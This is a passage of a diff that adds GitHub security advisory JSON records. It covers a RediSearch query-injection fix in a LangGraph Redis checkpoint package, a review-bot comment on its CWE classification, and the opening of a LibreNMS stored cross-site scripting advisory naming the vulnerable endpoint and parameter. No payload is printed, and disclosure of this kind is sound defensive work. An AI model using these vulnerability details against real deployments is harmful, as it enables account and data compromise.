+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/langchain-ai/langgraphjs/commit/814c76dc3938d0f6f7e17ca3bc11d6a12270b2a1"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/langchain-ai/langgraphjs"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/langchain-ai/langgraphjs/releases/tag/@langchain/langgraph-checkpoint-redis@1.0.2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-18T22:40:09Z",
+ "nvd_published_at": "2026-02-20T22:16:28Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json
new file mode 100644
index 0000000000000..73c3c3c48bb22
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json
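Review bot: `cwe_ids` carries only the generic `CWE-74`, although the `details` text describes filter keys and values being interpolated unescaped into a RediSearch query, i.e. injection into data-query logic; if the database's classification allows it, `CWE-943` (Improper Neutralization of Special Elements in Data Query Logic) is the more specific weakness and helps tooling that groups advisories by CWE. The `"introduced": "0"` / `"fixed": "1.0.2"` range matches the "Security hardening changes" section of `details`, and the `C:H/I:N/A:N` vector with `PR:L` is consistent with the `MODERATE` label, so the affected data itself needs no change.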
@@ -0,0 +1,73 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5pqf-54qp-32wx",
+ "modified": "2026-02-20T16:51:51Z",
+ "published": "2026-02-18T22:07:19Z",
+ "aliases": [
+ "CVE-2026-26991"
+ ],
+ "summary": "LibreNMS /device-groups name Stored Cross-Site Scripting",
+ "details": "### Summary\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.\n\n### Details\nThe vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/device-group/index.blade.php:_\n```\n@section('title', __('Device Groups'))\n@section('content')\n
\n\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n